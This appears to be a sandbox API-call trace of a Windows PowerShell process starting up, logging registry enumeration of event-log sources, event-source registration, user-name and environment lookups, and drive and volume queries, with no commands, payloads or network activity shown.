	[0706.086] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.086] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x364) returned 0x0
	[0706.086] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.086] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x368) returned 0x0
	[0706.086] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.086] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x36c) returned 0x0
	[0706.086] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.087] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x370) returned 0x0
	[0706.087] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x374) returned 0x0
	[0706.087] RegCloseKey (hKey=0x374) returned 0x0
	[0706.087] RegCloseKey (hKey=0x34c) returned 0x0
	[0706.087] RegCloseKey (hKey=0x370) returned 0x0
	[0706.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x370) returned 0x0
	[0706.088] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d03c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d038*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.088] CoTaskMemFree (pv=0x0) 
	[0706.089] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.089] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.089] CoTaskMemFree (pv=0xf4470) 
	[0706.089] CoTaskMemFree (pv=0x0) 
	[0706.089] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.089] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.089] CoTaskMemFree (pv=0xf4470) 
	[0706.089] CoTaskMemFree (pv=0x0) 
	[0706.089] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.089] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.089] CoTaskMemFree (pv=0xf4470) 
	[0706.089] CoTaskMemFree (pv=0x0) 
	[0706.089] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.089] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.090] CoTaskMemFree (pv=0xf4470) 
	[0706.090] CoTaskMemFree (pv=0x0) 
	[0706.090] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.090] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.090] CoTaskMemFree (pv=0xf4470) 
	[0706.090] CoTaskMemFree (pv=0x0) 
	[0706.090] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.090] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.090] CoTaskMemFree (pv=0xf4470) 
	[0706.090] CoTaskMemFree (pv=0x0) 
	[0706.090] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.090] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.090] CoTaskMemFree (pv=0xf4470) 
	[0706.090] CoTaskMemFree (pv=0x0) 
	[0706.090] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.091] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.091] CoTaskMemFree (pv=0xf4470) 
	[0706.091] CoTaskMemFree (pv=0x0) 
	[0706.091] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.091] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.091] CoTaskMemFree (pv=0xf4470) 
	[0706.091] CoTaskMemFree (pv=0x0) 
	[0706.091] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x34c) returned 0x0
	[0706.091] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.091] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x374) returned 0x0
	[0706.091] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.091] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x378) returned 0x0
	[0706.092] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.092] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x37c) returned 0x0
	[0706.092] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.092] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x380) returned 0x0
	[0706.092] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.092] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x384) returned 0x0
	[0706.092] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.092] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x388) returned 0x0
	[0706.092] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.093] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x38c) returned 0x0
	[0706.093] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.093] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x390) returned 0x0
	[0706.093] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x394) returned 0x0
	[0706.093] RegCloseKey (hKey=0x394) returned 0x0
	[0706.093] RegCloseKey (hKey=0x370) returned 0x0
	[0706.094] RegCloseKey (hKey=0x390) returned 0x0
	[0706.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d098 | out: phkResult=0x26d098*=0x390) returned 0x0
	[0706.095] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d00c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d008*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.095] CoTaskMemFree (pv=0x0) 
	[0706.095] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.095] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.095] CoTaskMemFree (pv=0xf4470) 
	[0706.095] CoTaskMemFree (pv=0x0) 
	[0706.095] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.095] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.095] CoTaskMemFree (pv=0xf4470) 
	[0706.095] CoTaskMemFree (pv=0x0) 
	[0706.095] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.095] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.095] CoTaskMemFree (pv=0xf4470) 
	[0706.095] CoTaskMemFree (pv=0x0) 
	[0706.096] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.096] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.096] CoTaskMemFree (pv=0xf4470) 
	[0706.096] CoTaskMemFree (pv=0x0) 
	[0706.096] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.096] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.096] CoTaskMemFree (pv=0xf4470) 
	[0706.096] CoTaskMemFree (pv=0x0) 
	[0706.096] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.096] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.096] CoTaskMemFree (pv=0xf4470) 
	[0706.096] CoTaskMemFree (pv=0x0) 
	[0706.096] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.096] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.096] CoTaskMemFree (pv=0xf4470) 
	[0706.096] CoTaskMemFree (pv=0x0) 
	[0706.097] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.097] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.097] CoTaskMemFree (pv=0xf4470) 
	[0706.097] CoTaskMemFree (pv=0x0) 
	[0706.097] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.097] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0xf4470, lpcchName=0x26d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.097] CoTaskMemFree (pv=0xf4470) 
	[0706.097] CoTaskMemFree (pv=0x0) 
	[0706.097] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x370) returned 0x0
	[0706.097] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.097] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x394) returned 0x0
	[0706.098] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.098] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x398) returned 0x0
	[0706.098] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.098] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x39c) returned 0x0
	[0706.098] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.098] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3a0) returned 0x0
	[0706.098] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.098] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3a4) returned 0x0
	[0706.099] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.099] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3a8) returned 0x0
	[0706.099] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.099] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3ac) returned 0x0
	[0706.099] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x0) returned 0x2
	[0706.099] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3b0) returned 0x0
	[0706.099] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0f8 | out: phkResult=0x26d0f8*=0x3b4) returned 0x0
	[0706.099] RegCloseKey (hKey=0x3b4) returned 0x0
	[0706.100] RegCloseKey (hKey=0x390) returned 0x0
	[0706.100] RegCloseKey (hKey=0x3b0) returned 0x0
	[0706.105] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b960008
	[0708.655] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed56b0*="WSMan", lpRawData=0x2ed5420) returned 1
	[0708.657] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.657] CoTaskMemFree (pv=0x139a40) 
	[0708.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.659] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0708.659] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0708.659] CoTaskMemFree (pv=0x1b88ccb0) 
	[0708.659] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0708.659] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0708.660] CoTaskMemFree (pv=0xf4470) 
	[0708.660] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edabe8*="Alias", lpRawData=0x2eda978) returned 1
	[0708.661] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.664] CoTaskMemFree (pv=0x139a40) 
	[0708.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.666] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0708.666] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0708.667] CoTaskMemFree (pv=0x1b88ccb0) 
	[0708.667] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0708.667] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0708.667] CoTaskMemFree (pv=0xf4470) 
	[0708.668] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee01e0*="Environment", lpRawData=0x2edff70) returned 1
	[0708.669] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.669] CoTaskMemFree (pv=0x139a40) 
	[0708.670] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.670] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0708.670] CoTaskMemFree (pv=0x139a40) 
	[0708.670] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.670] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0708.670] CoTaskMemFree (pv=0x139a40) 
	[0708.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0708.671] SetErrorMode (uMode=0x1) returned 0x1
	[0708.671] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d140 | out: lpFileInformation=0x26d140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0708.671] SetErrorMode (uMode=0x1) returned 0x1
	[0708.672] GetLogicalDrives () returned 0x4
	[0708.673] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0708.674] SetErrorMode (uMode=0x1) returned 0x1
	[0708.675] CoTaskMemAlloc (cb=0x68) returned 0x1b863d60
	[0708.675] CoTaskMemAlloc (cb=0x68) returned 0x1b863c80
	[0708.675] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b863d60, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d110, lpMaximumComponentLength=0x26d10c, lpFileSystemFlags=0x26d108, lpFileSystemNameBuffer=0x1b863c80, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d110*=0x9c354b42, lpMaximumComponentLength=0x26d10c*=0xff, lpFileSystemFlags=0x26d108*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0708.675] CoTaskMemFree (pv=0x1b863d60) 
	[0708.675] CoTaskMemFree (pv=0x1b863c80) 
	[0708.675] SetErrorMode (uMode=0x1) returned 0x1
	[0708.675] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
